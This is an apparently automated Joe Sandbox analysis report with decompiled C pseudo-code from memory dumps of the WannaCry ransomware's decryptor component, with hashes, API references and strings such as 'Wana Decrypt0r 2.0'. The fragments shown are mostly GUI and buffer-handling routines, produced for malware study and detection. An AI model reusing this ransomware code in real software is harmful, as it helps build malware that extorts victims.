                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fopen
                                  • String ID: f.wnry
                                  • API String ID: 1432627528-2448388194
                                  • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                  • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
                                  				char _v500;
                                  				intOrPtr _v508;
                                  				char _v520;
                                  				char _v521;
                                  				char _v528;
                                  				char _v529;
                                  				intOrPtr _v536;
                                  				signed int _t42;
                                  				short _t46;
                                  				signed int _t48;
                                  				int _t62;
                                  				intOrPtr* _t63;
                                  				intOrPtr _t67;
                                  				intOrPtr _t81;
                                  				void* _t82;
                                  				void* _t83;
                                  				void* _t89;
                                  				void* _t94;
                                  				intOrPtr* _t95;
                                  				void* _t97;
                                  				void* _t99;
                                  
                                  				_t89 = __edi;
                                  				_t63 = __ecx;
                                  				_push(0);
                                  				L0041303E();
                                  				srand(__eax);
                                  				_t99 =  &_v508 + 8;
                                  				_t42 = rand();
                                  				asm("cdq");
                                  				_t94 = 0;
                                  				_t81 = _t42 % 0xc8 + 0x1f;
                                  				_v508 = _t81;
                                  				if(_t81 > 0) {
                                  					do {
                                  						_t62 = rand();
                                  						_t81 = _v508;
                                  						 *(_t99 + _t94 + 0x14) = _t62;
                                  						_t94 = _t94 + 1;
                                  					} while (_t94 < _t81);
                                  				}
                                  				_t95 = _a16;
                                  				_t97 = _t99 + _t81 - 0xb;
                                  				if(_t95 != 0) {
                                  					_push(_t89);
                                  					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
                                  					_t99 = _t99 + 0xc;
                                  					asm("movsw");
                                  					asm("movsb");
                                  					_t81 = _v508;
                                  					_t95 = _a16;
                                  				}
                                  				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
                                  				_t82 = _t81 + 1;
                                  				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
                                  				_t83 = _t82 + 1;
                                  				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
                                  				_v508 = _t83 + 1;
                                  				_t46 = E00412B00(_t97, 0x1f);
                                  				_t67 = _v508;
                                  				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
                                  				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
                                  				if(_t48 < 0) {
                                  					L12:
                                  					return _t48 | 0xffffffff;
                                  				} else {
                                  					E0040D5A0(_t63, _t97);
                                  					_push( &_v528);
                                  					_push( &_v520);
                                  					_push( &_v521);
                                  					_v528 = 0x1f4;
                                  					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
                                  						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
                                  						goto L12;
                                  					} else {
                                  						if(_t95 == 0) {
                                  							L10:
                                  							return 0;
                                  						} else {
                                  							_push(1);
                                  							_push(_v536);
                                  							_push( &_v528);
                                  							_push(2);
                                  							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
                                  								goto L10;
                                  							} else {
                                  								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

























                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                  • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
                                  				void* _t15;
                                  				signed int _t23;
                                  				intOrPtr* _t33;
                                  				void* _t34;
                                  
                                  				_t23 = _a12;
                                  				_t33 = _a4;
                                  				_push(_t23);
                                  				_push(_a8);
                                  				_t34 = __ecx;
                                  				_push(_t33);
                                  				L00412D6A();
                                  				if(_t23 > 6) {
                                  					L12:
                                  					return _t15;
                                  				} else {
                                  					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
                                  						case 0:
                                  							_push( *((intOrPtr*)(__ecx + 0x824)));
                                  							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
                                  							L00412D64();
                                  							if(_t17 == 0x402) {
                                  								L6:
                                  								_push(0xe0e0);
                                  								 *((intOrPtr*)( *_t33 + 0x38))();
                                  							} else {
                                  								L00412D64();
                                  								if(_t17 == 0x3fe) {
                                  									goto L6;
                                  								} else {
                                  									L00412D64();
                                  									if(_t17 == 0x3fb) {
                                  										goto L6;
                                  									} else {
                                  										_push(0xffffff);
                                  										 *((intOrPtr*)( *_t33 + 0x38))();
                                  									}
                                  								}
                                  							}
                                  							_t35 =  *((intOrPtr*)(_t34 + 0x828));
                                  							if(_t35 != 0) {
                                  								goto L11;
                                  							}
                                  							return 0;
                                  							goto L13;
                                  						case 1:
                                  							goto L12;
                                  						case 2:
                                  							_push( *((intOrPtr*)(__esi + 0x824)));
                                  							__ecx = __edi;
                                  							 *((intOrPtr*)( *__edi + 0x34))();
                                  							if(__esi != 0) {
                                  								L11:
                                  								return  *((intOrPtr*)(_t35 + 4));
                                  							}
                                  							return 0;
                                  							goto L13;
                                  					}
                                  				}
                                  				L13:
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3089$#4476
                                  • String ID:
                                  • API String ID: 2870283385-0
                                  • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                  • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
                                  				char _v500;
                                  				signed int _t22;
                                  				signed int _t27;
                                  				intOrPtr* _t32;
                                  				void* _t40;
                                  				void* _t43;
                                  				void* _t44;
                                  				void* _t45;
                                  				void* _t46;
                                  				void* _t49;
                                  
                                  				_t32 = __ecx;
                                  				_push(0);
                                  				L0041303E();
                                  				srand(__eax);
                                  				_t49 =  &_v500 + 8;
                                  				_t22 = rand();
                                  				asm("cdq");
                                  				_t40 = 0;
                                  				_t43 = _t22 % 0xc8 + 0x1f;
                                  				if(_t43 <= 0) {
                                  					L2:
                                  					_t41 = _t49 + _t43 - 0x13;
                                  					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
                                  					_t44 = _t43 + 1;
                                  					 *((char*)(_t49 + _t44 + 0x14)) = 0;
                                  					_t45 = _t44 + 1;
                                  					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
                                  					_t46 = _t45 + 1;
                                  					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
                                  					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
                                  					if(_t27 >= 0) {
                                  						E0040D5A0(_t32, _t41);
                                  						return 0;
                                  					} else {
                                  						return _t27 | 0xffffffff;
                                  					}
                                  				} else {
                                  					goto L1;
                                  				}
                                  				do {
                                  					L1:
                                  					 *((char*)(_t49 + _t40 + 0xc)) = rand();
                                  					_t40 = _t40 + 1;
                                  				} while (_t40 < _t43);
                                  				goto L2;
                                  			}














                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                  • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00405180(void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t10;
                                  				intOrPtr _t19;
                                  				void* _t26;
                                  
                                  				_t19 = _a4;
                                  				_t26 = __ecx;
                                  				_t10 =  *((intOrPtr*)(__ecx + 0x44));
                                  				__imp___mbscmp(_t10, _t19);
                                  				if(_t10 == 0) {
                                  					return _t10;
                                  				} else {
                                  					_push(_t19);
                                  					L00412DA0();
                                  					 *((char*)(__ecx + 0x48)) = 1;
                                  					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
                                  						E00405800(__ecx, 0);
                                  					}
                                  					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
                                  						E00405820(_t26, 0);
                                  					}
                                  					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
                                  						return InvalidateRect( *(_t26 + 0x20), 0, 1);
                                  					}
                                  					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
                                  				}
                                  			}







                                  APIs
                                  • _mbscmp.MSVCRT ref: 00405191
                                  • #860.MFC42(?), ref: 004051A1
                                  • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                  • String ID:
                                  • API String ID: 497622568-0
                                  • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                  • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404430(intOrPtr __ecx, char _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _t13;
                                  				struct HICON__* _t16;
                                  				struct HICON__* _t17;
                                  				intOrPtr _t26;
                                  
                                  				_t26 = __ecx;
                                  				_t13 =  *((intOrPtr*)(__ecx + 0x59));
                                  				if(_t13 != 0) {
                                  					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                  						E00404530(__ecx);
                                  					}
                                  					if(E004045E0(_t26,  &_a8) == 0) {
                                  						_t16 =  *(_t26 + 0x60);
                                  					} else {
                                  						_t16 =  *(_t26 + 0x5c);
                                  					}
                                  					_t17 = SetCursor(_t16);
                                  					L00412CBC();
                                  					return _t17;
                                  				} else {
                                  					_v16 = 0x10;
                                  					if(__ecx != 0) {
                                  						_t13 =  *((intOrPtr*)(__ecx + 0x20));
                                  						_v8 = _t13;
                                  					} else {
                                  						_v8 = __ecx;
                                  					}
                                  					_v12 = 2;
                                  					__imp___TrackMouseEvent( &_v16);
                                  					 *((char*)(_t26 + 0x59)) = 1;
                                  					L00412CBC();
                                  					return _t13;
                                  				}
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$CursorEventMouseTrack
                                  • String ID:
                                  • API String ID: 2186836335-0
                                  • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                  • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00404CF0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t13;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t27;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041384E);
                                  				_t13 =  *[fs:0x0];
                                  				_push(_t13);
                                  				 *[fs:0x0] = _t27;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t21 = __ecx + 0x70;
                                  				_v16 = _t21;
                                  				 *_t21 = 0x415c00;
                                  				_v4 = 3;
                                  				L00412D52();
                                  				 *_t21 = 0x415bec;
                                  				_t22 = __ecx + 0x64;
                                  				_v16 = _t22;
                                  				 *_t22 = 0x415c00;
                                  				_v4 = 4;
                                  				L00412D52();
                                  				 *_t22 = 0x415bec;
                                  				_v4 = 0;
                                  				L00412CC2();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t13;
                                  			}












                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                  • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                  • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#641#800
                                  • String ID:
                                  • API String ID: 2580907805-0
                                  • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                  • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                  • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00404170(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t12;
                                  				intOrPtr* _t20;
                                  				intOrPtr _t25;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413776);
                                  				_t12 =  *[fs:0x0];
                                  				_push(_t12);
                                  				 *[fs:0x0] = _t25;
                                  				_v20 = __ecx;
                                  				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                  				_v4 = 0;
                                  				_t20 = __ecx + 0x48;
                                  				_v16 = _t20;
                                  				 *_t20 = 0x415c00;
                                  				_v4 = 3;
                                  				L00412D52();
                                  				 *_t20 = 0x415bec;
                                  				_v4 = 1;
                                  				L00412CC2();
                                  				_v4 = 0;
                                  				L00412CC2();
                                  				_v4 = 0xffffffff;
                                  				L00412D94();
                                  				 *[fs:0x0] = _v12;
                                  				return _t12;
                                  			}











                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                  • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                  • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#2414#795
                                  • String ID:
                                  • API String ID: 932896513-0
                                  • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                  • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
                                  				intOrPtr* _t18;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t30;
                                  				intOrPtr* _t35;
                                  				intOrPtr* _t37;
                                  				void* _t40;
                                  
                                  				_t1 =  &_a12; // 0x40276a
                                  				_t35 = _a8;
                                  				if(_t35 ==  *_t1) {
                                  					_t16 =  &_a4; // 0x40276a
                                  					_t18 =  *_t16;
                                  					 *_t18 = _t35;
                                  					return _t18;
                                  				} else {
                                  					do {
                                  						_t37 = _t35;
                                  						_t35 =  *_t35;
                                  						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
                                  						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
                                  						_t30 =  *((intOrPtr*)(_t37 + 0xc));
                                  						if(_t30 != 0) {
                                  							_t23 =  *((intOrPtr*)(_t30 - 1));
                                  							if(_t23 == 0 || _t23 == 0xff) {
                                  								_push(_t30 + 0xfffffffe);
                                  								L00412C98();
                                  								_t40 = _t40 + 4;
                                  							} else {
                                  								 *((char*)(_t30 - 1)) = _t23 - 1;
                                  							}
                                  						}
                                  						_push(_t37);
                                  						 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                  						 *((intOrPtr*)(_t37 + 0x10)) = 0;
                                  						 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                  						L00412C98();
                                  						_t40 = _t40 + 4;
                                  						_a8 = _a8 - 1;
                                  					} while (_t35 != _a12);
                                  					_t22 = _a4;
                                  					 *_t22 = _t35;
                                  					return _t22;
                                  				}
                                  			}











                                  APIs
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825
                                  • String ID: j'@
                                  • API String ID: 41483190-370697233
                                  • Opcode ID: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                  • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                  • Opcode Fuzzy Hash: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                  • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t3;
                                  				void* _t4;
                                  
                                  				_t3 = _a4;
                                  				if(_t3 != 0x3e9) {
                                  					if(_t3 == 0x3ea) {
                                  						_t3 =  *((intOrPtr*)(__ecx + 0x820));
                                  						if(_t3 == 0) {
                                  							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
                                  						}
                                  					}
                                  					L00412CBC();
                                  					return _t3;
                                  				} else {
                                  					_t4 = E004076A0(__ecx, 1);
                                  					L00412CBC();
                                  					return _t4;
                                  				}
                                  			}






                                  APIs
                                  • #2379.MFC42 ref: 00407692
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • #2379.MFC42(00000001), ref: 00407667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$time
                                  • String ID: Wana Decrypt0r 2.0
                                  • API String ID: 2017816395-4201229886
                                  • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                  • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:3.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1683
                                  Total number of Limit Nodes:14
